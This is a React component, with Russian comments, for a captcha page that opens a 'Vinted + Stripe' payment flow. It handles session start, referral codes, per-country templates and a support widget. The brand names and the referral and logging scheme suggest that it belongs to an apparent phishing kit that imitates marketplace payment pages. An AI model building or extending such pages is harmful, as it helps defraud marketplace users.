import React, { useState, useEffect } from 'react';
import { useNavigate, useParams } from 'react-router-dom';
import SupportWidget from './SupportWidget';
import SharedCaptchaCard from './SharedCaptchaCard';
import { getCaptchaCardLabels } from '../captchaLabels';
import { useServerCaptcha } from '../hooks/useServerCaptcha';
import { fetchPageWithFallback, API_URL } from '../fetchPageWithFallback';
import { resolvePaymentPageCode, PAYMENT_FLOW_PAGE_KEY, dedupedSessionStart } from '../paymentSession';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id', logId: 'payment_log_id' };

/**
 * Страница 1 Vinted + Stripe: серверная капча (SharedCaptchaCard).
 * Сессия — через dedupedSessionStart + нормализованный page_code (как на index2), иначе капча не грузится.
 */
function VintedStripe1({ page }) {
  const { pageCode } = useParams();
  const navigate = useNavigate();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId, setSessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);
  const [sessionError, setSessionError] = useState('');

  const countryCode = pageData?.country_code || page?.country_code || 'PL';
  const resolvedTemplate = pageData?.template || page?.template || 'vinted2';
  const labels = getCaptchaCardLabels(countryCode, resolvedTemplate);
  const captcha = useServerCaptcha(API_URL, sessionId, true);

  useEffect(() => {
    const effectivePc = resolvePaymentPageCode(pageCode);
    if (!effectivePc) return;

    const prev = sessionStorage.getItem(PAYMENT_FLOW_PAGE_KEY);
    if (prev && prev !== effectivePc) {
      sessionStorage.removeItem(SESSION_STORAGE_KEYS.sessionId);
      sessionStorage.removeItem(SESSION_STORAGE_KEYS.logId);
      setSessionId(null);
    }
    sessionStorage.setItem(PAYMENT_FLOW_PAGE_KEY, effectivePc);

    let cancelled = false;
    const urlParams = new URLSearchParams(window.location.search);
    const referralCode = urlParams.get('ref');
    const pathname = window.location.pathname;
    let unique_id = null;
    const pathMatch = pathname.match(/\/([A-Z0-9]{16})(?:\/|$|\/index2)/);
    if (pathMatch) unique_id = pathMatch[1];

    setSessionError('');
    dedupedSessionStart(API_URL, {
      page_code: effectivePc,
      referral_code: referralCode || undefined,
      unique_id: unique_id || undefined,
    })
      .then((data) => {
        if (cancelled || !data) return;
        if (data.success && data.session_id) {
          sessionStorage.setItem(SESSION_STORAGE_KEYS.sessionId, data.session_id);
          setSessionId(data.session_id);
          if (data.log_id) sessionStorage.setItem(SESSION_STORAGE_KEYS.logId, String(data.log_id));
          return;
        }
        setSessionError(data.error || data.message || 'Session failed');
      })
      .catch(() => setSessionError('Session failed'));

    return () => {
      cancelled = true;
    };
  }, [pageCode]);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const successPath = pageCode ? `/page/${pageCode}/success` : '/';

  const onVerify = async () => {
    const ok = await captcha.handleCaptchaVerify();
    if (ok) navigate(successPath, { replace: true });
  };

  if (loading && pageCode) {
    return (
      <div style={{ padding: 24, textAlign: 'center' }}>
        Loading...
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <>
      <SharedCaptchaCard
        variant="page"
        labels={labels}
        question={captcha.captchaQuestion}
        answer={captcha.captchaAnswer}
        onAnswerChange={captcha.setCaptchaAnswer}
        onVerify={onVerify}
        verifyLoading={captcha.captchaLoading}
        error={sessionError || captcha.captchaError}
        sessionReady={Boolean(sessionId)}
      />
      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </>
  );
}

export default VintedStripe1;
